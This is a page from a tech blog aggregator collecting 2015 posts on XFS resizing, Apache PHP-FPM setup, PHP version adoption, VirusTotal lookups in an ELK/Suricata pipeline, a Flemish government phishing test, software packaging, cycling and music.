If you're on a VMware machine, have a look at this guide to increase the block device, partition and LVM volume first: Increase A VMware Disk Size (VMDK) Formatted As Linux LVM without rebooting. Once you reach the resize2fs command, return here, as that only applies to EXT2/3/4.

To see the info of your block device, use xfs_info.

$ xfs_info /dev/mapper/centos-root
meta-data=/dev/mapper/centos-root isize=256    agcount=4, agsize=1210880 blks
         =                       sectsz=512   attr=2, projid32bit=1
         =                       crc=0
data     =                       bsize=4096   blocks=4843520, imaxpct=25
         =                       sunit=0      swidth=0 blks
naming   =version 2              bsize=4096   ascii-ci=0 ftype=0
log      =internal               bsize=4096   blocks=2560, version=2
         =                       sectsz=512   sunit=0 blks, lazy-count=1
realtime =none                   extsz=4096   blocks=0, rtextents=0

Once the volume group/logical volume has been extended (see this guide for increasing lvm), you can expand the partition using xfs_growfs.

$  xfs_growfs /dev/mapper/centos-root
meta-data=/dev/mapper/centos-root isize=256    agcount=4, agsize=1210880 blks
         =                       sectsz=512   attr=2, projid32bit=1
         =                       crc=0
data     =                       bsize=4096   blocks=4843520, imaxpct=25
         =                       sunit=0      swidth=0 blks
naming   =version 2              bsize=4096   ascii-ci=0 ftype=0
log      =internal               bsize=4096   blocks=2560, version=2
         =                       sectsz=512   sunit=0 blks, lazy-count=1
realtime =none                   extsz=4096   blocks=0, rtextents=0

The increase will happen in near-realtime and probably won't take more than a few seconds.

Using just xfs_growfs, the filesystem will be increased to its maximum available size. If you want to only increase for a couple of blocks, use the -D option.

If you don't see any increase in disksize using df, check this guide: Df command in Linux not updating actual diskspace, wrong data.

The post Increase/Expand an XFS Filesystem in RHEL 7 / CentOS 7 appeared first on

by Mattias Geniar at August 02, 2015 07:09 PM

Apache 2.4: ProxyPass (For PHP) Taking Precedence Over Files/FilesMatch In Htaccess

The post Apache 2.4: ProxyPass (For PHP) Taking Precedence Over Files/FilesMatch In Htaccess appeared first on

I got to scratch my head on this one for a while. If you're writing a PHP-FPM config for Apache 2.4, don't use the ProxyPassMatch directive to pass PHP requests to your FPM daemon.

This will cause you headaches:

# don't
<IfModule mod_proxy.c>
  ProxyPassMatch ^/(.*\.php(/.*)?)$ fcgi://

You will much rather want to use a FilesMatch block and refer those requests to a SetHandler that passes everything to PHP.

# do this instead
# Use SetHandler on Apache 2.4 to pass requests to PHP-PFM
<FilesMatch \.php$>
  SetHandler "proxy:fcgi://"

Why is this? Because the ProxyPassMatch directives are evaluated first, before the FilesMatch configuration is being run.

That means if you use ProxyPassMatch, you can't deny/allow access to PHP files and can't manipulate your PHP requests in any way anymore.

So for passing PHP requests to an FPM daemon, you'd want to use FilesMatch + SetHandler, not ProxyPassMatch.

The post Apache 2.4: ProxyPass (For PHP) Taking Precedence Over Files/FilesMatch In Htaccess appeared first on

by Mattias Geniar at August 02, 2015 08:05 AM

August 01, 2015

Philip Van Hoof

Gebruik maken van verbanden tussen metadata

Ik beweerde onlangs ergens dat een systeem dat verbanden (waar, wanneer, met wie, waarom) in plaats van louter metadata (titel, datum, auteur, enz.) over content verzamelt een oplossing zou kunnen bieden voor het probleem dat gebruikers van digitale media meer en meer zullen hebben; namelijk dat ze teveel materiaal gaan verzameld hebben om er ooit nog eens iets snel genoeg in terug te vinden.

Ik denk dat verbanden meer gewicht moeten krijgen dan louter de metadata omdat het door middel van verbanden is dat wij mensen in onze hersenen informatie onthouden. Niet door middel van feiten (titel, datum, auteur, enz.) maar wel door middel van verbanden (waar, wanneer, met wie, waarom) .

Ik gaf als hypothetisch voorbeeld dat ik een video wilde vinden die ik gekeken had met Erika toen ik op vakantie was met haar en die zij als super tof had gemarkeerd.

Wat zijn de verbanden die we moeten verzamelen? Dit is een eenvoudig oefeningetje in analyse: gewoon de zelfstandige naamwoorden onderlijnen en het probleem opnieuw uitschrijven:

Dus laat ik deze use-case eens in RDF gieten en oplossen met SPARQL. Dit moeten we verzamelen. Ik schrijf het in pseudo TTL. Bedenk er even bij dat deze ontology helemaal bestaat:

<erika> a Person ; name "Erika" .
<vakantiePlek> a PointOfInterest ; title "De vakantieplek" .
<filmA> a Movie ; lastSeenAt <vakantiePlek> ; sharedWith <erika>; title "The movie" .
<erika> likes <filmA> .

Dit is daarna de SPARQL query:

SELECT ?m { ?v a Movie ; title ?m . ?v lastSeenAt ?p . ?p title ?pt . ?v sharedWith <erika> . <erika> likes ?v . FILTER (?pt LIKE '%vakantieplek%') }

Ik laat het als een oefening aan de lezer om dit naar de ontology Nepomuk om te zetten (volgens mij kan het deze hele use-case aan). En dan kan je dat eens op je N9 of je standaard GNOME desktop testen met de tool tracker-sparql. Wedden dat het werkt. :-)

Het grote probleem is inderdaad de data aquisitie van de verbanden. De query maken is vrij eenvoudig. De ontology vastleggen en afspreken met alle partijen al wat minder. De informatie verzamelen is dé moeilijkheid.

Oh ja. En eens verzameld, de informatie veilig bijhouden zonder dat mijn privacy geschonden wordt. Dat lijkt tegenwoordig gewoonweg onmogelijk. Helaas.

Het is in ieder geval niet nodig dat een supercomputer of zo dit centraal moet oplossen (met AI en heel de gruwelijk complexe hype zooi van vandaag).

Ieder klein toestelletje kan dit soort use-cases zelfstandig oplossen. De bovenstaande inserts en query zijn eenvoudig op te lossen. SQLite doet dit in een paar milliseconden met een gedenormalizeerd schema. Uw fancy hipster NoSQL oplossing waarschijnlijk ook.

Dat is omdat het gewicht van data aquisitie op de verbanden ligt in plaats van op de feiten.

by admin at August 01, 2015 02:48 PM

July 31, 2015

Frank Goossens

I Am A Cyclist, And I Am Here To Fuck You Up

I Am A Cyclist, And I Am Here To Fuck You Up

It is morning. You are slow-rolling off the exit ramp, nearing the end of the long-ass commute from your suburban enclave. You have seen the rise of the city grow larger and larger in your windshield as you crawled through sixteen miles of bumper-to-bumper traffic. You foolishly believed that, now that you are in the city, your hellish morning drive is coming to an end.

Just then! I emerge from nowhere to whirr past you at twenty-two fucking miles per hour, passing twelve carlengths to the stoplight that has kept you prisoner for three cycles of green-yellow-red. The second the light says go, I am GOING, flying, leaving your sensible, American, normal vehicle in my dust.

by frank at July 31, 2015 07:34 AM

July 30, 2015

Joram Barrez

The Activiti Performance Showdown Running on Amazon Aurora

Earlier this week, Amazon announced that Amazon Aurora is generally available on Amazon RDS. The Aurora website promises a lot: Amazon Aurora is a MySQL-compatible, relational database engine that combines the speed and availability of high-end commercial databases with the simplicity and cost-effectiveness of open source databases. Amazon Aurora provides up to five times better […]

by Joram Barrez at July 30, 2015 03:09 PM

Frank Goossens

Vouwfiets-dilemma’s 2015

Na 5 jaar vouwfietsen, naar schatting 23.000 km en 3 nieuwe stuurscharnieren (!) heb ik mijn Dahon Vitesse D7HG dan toch vervangen. Ik heb getwijfeld of ik dan toch voor Brompton zou gaan, maar zelfs het basismodel kost bijna dubbel zoveel en rekening houdend met de opties die ik zou moeten bijbetalen, mijn fietskilometers, het terrein (Brussel is veeleisend voor fiets en berijder) en mijn … slijtige rijstijl, zie ik me die extra investering daar absoluut niet uithalen.

Oud (2010) en nieuw (2015) nog even samen

Een nieuwe Dahon Vitesse D7HG dus (en ja, opnieuw met die Shimano Nexus 7-speed internal hub, wie zou er nu om god nog met een derailleur willen rondrijden?), maar daar stopte het twijfelen niet; meer dan 20% goedkoper (!) online kopen, of voor de fietsenmaker om de hoek kiezen. Het is de fietsenmaker geworden; voor reparaties onder garantie (stuurscharnieren, bijvoorbeeld) moet je bij de online winkel de fiets opsturen en ben je hem al gauw enkele weken kwijt. En voor gewone reparaties ben ik daar de afgelopen 5 jaar (en daarvoor, met mijn andere fietsen) ondanks de drukte altijd snel, goed en goedkoop geholpen. Nee, die 20% investering in de beste service-na-verkoop (en in de lokale economie), die haal ik er dan wel weer uit.

by frank at July 30, 2015 07:21 AM

July 29, 2015

Mattias Geniar

Why We’re Still Seeing PHP 5.3 In The Wild (Or: PHP Versions, A History)

The post Why We’re Still Seeing PHP 5.3 In The Wild (Or: PHP Versions, A History) appeared first on

WordPress offers an API that can list the PHP versions used in the wild. It shows some interesting numbers that warrant some extra thoughts.

Here's the current statistics in PHP versions used in WordPress installations. It uses jq for JSON formatting at the CLI.

$ curl | jq '.'
  "5.2": 13.603,
  "5.3": 32.849,
  "5.4": 40.1,
  "5.5": 9.909,
  "5.6": 3.538

Two versions stand out: PHP 5.3 is used in 32.8% of all installations, PHP 5.4 on 40.1%.

Both of these versions are end of life. Only PHP 5.4 receives security updates [2] until mid-september of this year. No more bug fixes. That's 1.5 months left on the counter, without any bugfixes.

But if they're both considered end of life, why do they still account for 72.9% of all WordPress installations?

Prologue: Shared Hosting

These stats are gathered by WordPress anonymously. Since most of the WordPress installations are on shared hosting, it's safe to assume they are done once, never looked at again. It's a good thing WordPress can auto-update, or the web would be doomed.

There are of course WordPress installations on custom servers, managed systems, ... etc, but they will account for a small percentage of all WordPress installations. It's important to keep in mind that the rest of these numbers will be mostly applicable to shared hosting, only.

PHP Version Support

Here's a quick history of relevant PHP versions, meaning 5.0 and upwards. I'll ignore the small percentage of sites still running on PHP 4.x.

Version Released End Total duration
5.0 July 13th, 2004 September 5th, 2005 419 days
5.1 November 24th, 2005 August 24th, 2006 273 days
5.2 November 2nd, 2006 January 6th, 2011 1526 days
5.3 June 30th, 2009 August 14th, 2014 1871 days
5.4 March 1st, 2012 September 14th, 2015 1292 days
5.5 June 20th, 2013 July 10th, 2016 1116 days
5.6 August 28th, 2014 August 28th, 2017 1096 days

It's no wonder we're still seeing PHP 5.3 in the wild, the version has been supported for more than 5 years. That means a lot of users will have installed WordPress on a PHP 5.3 host and just never bothered updating, because of the install once, update never mentality.

As long as their WordPress continues to work, why would they -- right? [1]

If my research was correct, in 2005 there were 2 months where there wasn't a supported version of PHP 5. At that time, support for 5.0 was dropped and 5.1 wasn't released until a couple of months later.

Versions vs. Server Setups

PHP has been around for a really long time and it's seen its fair share of server setups. It's been run as mod_php in Apache, CGI, FastCGI, embedded, CLI, litespeed, FPM and many more. We're now evolving to multiple PHP-FPM masters per server, each for its own site.

With the rise of HHVM, we'll see even more different types of PHP deployments.

From what I can remember of my earlier days in hosting, this was the typical PHP setup on shared hosting.

Version Server setup
5.0 Apache + mod_php
5.1 Apache + mod_php
5.2 Apache + suexec + CGI
5.3 Apache + suexec + FastCGI
5.4 Apache + FPM
5.5 Apache + FPM
5.6 Apache + FPM

The server-side has seen a lot of movement. The current method of running PHP as FPM daemons is far superior to running it as mod_php or CGI/FastCGI. But it took the hosting world quite some time to adopt this.

Even with FPM support coming to PHP 5.3, most servers were still running as CGI/FastCGI.

That was/is a terrible way to run PHP.

It's probably what made it take so long to adopt PHP 5.4 on shared hosting servers. It required a complete rewrite of everything that is shared hosting. No more CGI/FastCGI, but implementing proxy-setups to pass data to PHP-FPM. Since FPM support didn't come to PHP 5.3 since a couple of minor versions in, most hosting providers only experienced FPM on 5.4. Once their FPM config was ready, adopting PHP 5.5 and 5.6 was trivial.

Only PHP 5.5's changed opcache made for some configuration changes, but didn't have any further server-side impact.

PHP 5.3 has been supported for a really long time. PHP 5.4 took ages to be implemented on most shared server setups, prolonging the life of PHP 5.3 even long past its expiration date..

If you're installing PHP on a new Red Hat Enterprise Linux/CentOS 7, you get version 5.4. RHEL still backports security fixes[2] from newer releases to 5.4 if needed, but it's essentially an end of life version. It may get security fixes[2], but it won't get bug fixes.

This causes the increase in PHP 5.4 worldwide. It's the default version on the latest RHEL/CentOS.

Moving PHP forward

In order to let these ancient versions of PHP finally rest in peace, a few things need to change drastically. The same reasons that have kept PHP 5.3 alive for so long.

  1. WordPress needs to bump its minimal PHP version from 5.2 to at least PHP 5.5 or 5.6
  2. Drupal 7 also runs on PHP 5.2, with Drupal 8 bumping the minimum version to 5.5.
  3. Shared Hosting providers need to drop PHP 5.2, 5.3 and 5.4 support and move users to 5.5 or 5.6.
  4. OS vendors and packagers need to make at least PHP 5.5 or 5.6 the default, instead of 5.4 that's nearly end of life.

We are doing what we can to improve point 3), by encouraging shared hosting users to upgrade to later releases. Fingers crossed WordPress and OS vendors do the same.

It's unfair to blame PHP, the company, that we're still seeing 5.3 and 5.4 in the wild today. But because both versions have been supported for such a really long time, their install base is naturally large.

Later releases of PHP have seen shorter support cycles, which will make users think more about upgrading and schedule accordingly. Having a consistent release and deprecation schedule is vital for faster adoption rates.

[1] Well, if you ignore security, speed and scalability as added benefits.
[2] I've proclaimed "PHP's CVE Vulnerabilities as being irrelevant, and I still stand by that.

The post Why We’re Still Seeing PHP 5.3 In The Wild (Or: PHP Versions, A History) appeared first on

by Mattias Geniar at July 29, 2015 07:32 PM

Frank Goossens

The 2 Bears Getting Together on Our Tube

The 2 Bears is a duo comprised of Hot Chip’s Joe Goddard and Raf Rundell. “Get Together” is one of the songs on their 2012 debut album “Be Strong”.

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at July 29, 2015 06:05 AM

July 28, 2015

Xavier Mertens

Integrating VirusTotal within ELK

[The post Integrating VirusTotal within ELK has been first published on /dev/random]

VirusTotal Scan[This blogpost has also been published as a guest diary on]

Visualisation is a key when you need to keep control of what’s happening on networks which carry daily tons of malicious files. is a key player in fighting malwares on a daily basis. Not only, you can submit and search for samples on their website but they also provide an API to integrate in your software or scripts. A few days ago, Didiers Stevens posted some SANS ISC diaries about the Integration of VirusTotal into Microsoft sysinternal tools (here, here and here). The most common API call is to query the database for a hash. If the file was already submitted by someone else and successfilly scanned, you’ll get back interesting results, the most known being the file score in the form “x/y”. The goal of my setup is to integrate within my ELK setup. To feed virustotal, hashes of interesting files must be computed. I’m getting interesting hashes via my Suricata IDS which inspect all the Internet traffic passing through my network.

The first step is to configure the MD5 hashes support in Suricata. The steps are described here. Suricata logs are processed by a Logstash forwarder and MD5 hashes are stored and indexed via the field ‘fileinfo.md5‘:

MD5 Hash

(Click to enlarge)

Note: It is mandatory to configure Suricata properly to extract files from network flows. Otherwise, the MD5 hashes won’t be correct. It’s like using a snaplen of ‘0’ with tcpdump. In Suricata, have a look at the inspected response body size for HTTP requests and the stream reassembly depth. This could also have an impact on performances, fine tune them to match your network behavior.

To integrate VirusTotal within ELK, a Logstash filter already exists, developed by Jason Kendall. The code is available on To install it, follow this procedure:

# cd /data/src
# git clone
# cd logstash-filter-virustotal
# gem2.0 build logstash-filter-awesome.gemspec
# cd /opt/logstash
# bin/plugin install /data/src/logstash-filter-virustotal/logstash-filter-virustotal-0.1.1.gem

Now, create a new filter which will call the plugin and restart Logstash.

filter {
    if ( [event_type] == "fileinfo" and
         [fileinfo][filename] =~ /(?i)\.(doc|pdf|zip|exe|dll|ps1|xls|ppt)/ ) {
        virustotal {
            apikey => '<put_your_vt_api_key_here>'
            field => '[fileinfo][md5]'
            lookup_type => 'hash'
            target => 'virustotal'

The filter above will query for the MD5 hash stored in ‘fileinfo.md5‘ to virustotal;com if the event contains file information generated by Suricata and if the filename contains an interesting extension. Of course, you can adapt the filter to your own environment and match only specific file format using ‘fileinfo.magic‘ or a minimum file size using ‘fileinfo.size‘. If conditions match a file, a query will be performed using the API and results stored into a new ‘virustotal‘ field:

VirusTotal Results

(Click to enlarge)

Now, it’s up to you to build your ElasticSearch queries and dashboard to detect suspicious activities in your network. During the implementation, I detected that too many requests sent in parallel to might freeze my Logstash (mine is 1.5.1). Also, keep an eye on your API key consumption to not break your request rate or daily/monthly quota.

[The post Integrating VirusTotal within ELK has been first published on /dev/random]

by Xavier at July 28, 2015 05:57 PM

The Rough Life of Defenders VS. Attackers

[The post The Rough Life of Defenders VS. Attackers has been first published on /dev/random]

Scale of JusticeYesterday, It was the first time that I heard the expression “Social Engineering” in Belgian public media! If this topic came in the news, you can imagine that something weird (or juicy from a journalist perspective) happened. The Flemish administration had the good idea to test the resistance of their 15K officials against a phishing attack. As people remain the weakest link, it sounds a good initiative right? But if it was disclosed in the news, you can imagine that it was in fact … a flop! (The article is available here in French)

The scenario was classic but well written. People received an email from Thalys, an international train operator (and used by many Belgian travellers), which reported a billing issue with their last trip. If they did not provide their bank details, their credit card will be charged up to 20K EUR. The people behind this scenario have not thought about the possible side effects of such a massive mailing. People flooded the Thalys customer support center with angry calls, others simply notified the Police. Thalys, being a commercial company, reacted about the lack of communication and the unauthorized usage of their brand in the rogue email.

I already performed the same kind of social engineering attacks for customers and I know that it’s definitively not easy. Instead of breaking into computers, we are trying to break into humans’ behavior and their reactions can be very different: fear, shame, anger, … I suppose that the Flemish government was working with a partner or contractor to organize the attack. They should have to follow the following rules:

But a few hours ago, while driving back to home and thinking about this bad story, I realized that this proves once again the big differences between defenders and attackers! Attackers are using copyrighted material all the time, they build fake websites or compromize official ones to inject malicious payloads in visitors’ browser. They are sending millions of emails targeting everybody. On the other side, defenders have to perform their job while defending their ass at the same time!  And the recent changes like the updated Waasenaar arrangement won’t help in the future. I’m curious about the results of this giant test. How many people really clicked, opened a file or communicated their bank details? That was not reported in the news…

[The post The Rough Life of Defenders VS. Attackers has been first published on /dev/random]

by Xavier at July 28, 2015 08:37 AM

Kris Buytaert

The power of packaging software, package all the things

Software delivery is hard, plenty of people all over this planet are struggling with delivering software in their own controlled environment. They have invented great patterns that will build an artifact, then do some magic and the application is up and running.

When talking about continuous delivery, people invariably discus their delivery pipeline and the different components that need to be in that pipeline.
Often, the focus on getting the application deployed or upgraded from that pipeline is so strong that teams
forget how to deploy their environment from scratch.

After running a number of tests on the code , compiling it where needed, people want to move forward quickly and deploy their release artifact on an actual platform.
This deployment is typically via a file upload or a checkout from a source-control tool from the dedicated computer on which the application resides.
Sometimes, dedicated tools are integrated to simulate what a developer would do manually on a computer to get the application running. Copy three files left, one right, and make sure you restart the service. Although this is obviously already a large improvement over people manually pasting commands from a 42 page run book, it doesn’t solve all problems.

Like the guy who quickly makes a change on the production server, never to commit the change, (say goodbye to git pull for your upgrade process)
If you package your software there are a couple of things you get for free from your packaging system.
Questions like, has this file been modified since I deployed it, where did this file come from, when was it deployed,
what version of software X do I have running on all my servers, are easily answered by the same
tools we use already for every other package on the system. Not only can you use existing tools you are also using tools that are well known by your ops team and that they
already use for every other piece of software on your system.

If your build process creates a package and uploads it to a package repository which is available for the hosts in the environment you want to deploy to, there is no need anymore for
a script that copies the artifact from a 3rd party location , and even less for that 42 page text document which never gets updated and still tells you to download yaja.3.1.9.war from a location where you can only find
3.2 and 3.1.8 and the developer that knows if you can use 3.2 or why 3.1.9 got removed just left for the long weekend.

Another, and maybe even more important thing, is the current sadly growing practice of having yet another tool in place that translates that 42 page text document to a bunch of shell scripts created from a drag and drop interface, typically that "deploy tool" is even triggered from within the pipeline. Apart from the fact that it usually stimulates a pattern of non reusable code, distributing even more ssh keys , or adding yet another agent on all systems. it doesn’t take into account that you want to think of your servers as cattle and be able to deploy new instances of your application fast.
Do you really want to deploy your five new nodes on AWS with a full Apache stack ready for production, then reconfigure your load balancers only to figure out that someone needs to go click in your continuous integration tool or deployment to deploy the application to the new hosts? That one manual action someone forgets?
Imvho Deployment tools are a phase in the maturity process of a product team.. yes it's a step up from manually deploying software but it creates more and other problems , once your team grows in maturity refactoring out that tool is trivial.

The obvious and trivial approach to this problem, and it comes with even more benefits. is called packaging. When you package your artifacts as operating system (e.g., .deb or .rpm) packages,
you can include that package in the list of packages to be deployed at installation time (via Kickstart or debootstrap). Similarly, when your configuration management tool
(e.g., Puppet or Chef) provisions the computer, you can specify which version of the application you want to have deployed by default.

So, when you’re designing how you want to deploy your application, think about deploying new instances or deploying to existing setups (or rather, upgrading your application).
Doing so will make life so much easier when you want to deploy a new batch of servers.

by Kris Buytaert at July 28, 2015 06:35 AM

July 26, 2015

Mattias Geniar

This American Life: The DevOps Episode

The post This American Life: The DevOps Episode appeared first on

If you're a frequent podcast listener, chances are you've heard of the This American Life podcast. It's probably the most listened-to podcast available.

While it normally features all kind of content, from humorous stories to gripping drama, last weeks episode felt a bit different.

They ran a story about NUMMI, a car plant where Toyota and GM worked together to improve productivity.

Throughout the story, there are a lot of topics being mentioned that can all be brought back to our DevOps ways;

There are lot more details available in the podcast and you'd be amazed how many can be analogies to our DevOps movement.

If you're using the Overcast podcast player (highly recommended), you can get the episode here: NUMMI 2015. Or you can grab it from the official website/itunes at

The post This American Life: The DevOps Episode appeared first on

by Mattias Geniar at July 26, 2015 08:49 AM

July 24, 2015

Frank Goossens

How technology (has not) improved our lives

The future is bright, you’ve got to wear shades? But why do those promises for a better future thanks to technology often fail to materialize? And how is that linked with the history of human flight, folding paper and the web? Have a look at “Web Design: first 100 years”, a presentation by Maciej Cegłowski (the guy behind An interesting read!

by frank at July 24, 2015 04:57 PM

Music from Our Tube; Algiers’ Black Eunuch

As heard on KCRW just now. The live version on KEXP is pretty intense, but somehow does not seem fully … fleshed out yet. Anyways, Algiers is raw, psychedelic & very promising;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at July 24, 2015 09:40 AM